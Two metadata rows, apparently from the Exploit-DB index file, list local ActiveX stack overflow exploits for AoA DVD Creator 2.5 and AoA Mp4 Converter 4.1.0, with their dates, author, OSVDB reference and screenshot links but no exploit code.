 16132,exploits/windows/local/16132.html,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",local,windows,,2011-02-07,2011-02-07,1,OSVDB-107970,,,http://www.exploit-db.com/screenshots/idlt16500/16132.png,,
 16133,exploits/windows/local/16133.html,"AoA Mp4 Converter 4.1.0 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",local,windows,,2011-02-07,2011-02-07,1,,,,http://www.exploit-db.com/screenshots/idlt16500/16133.png,,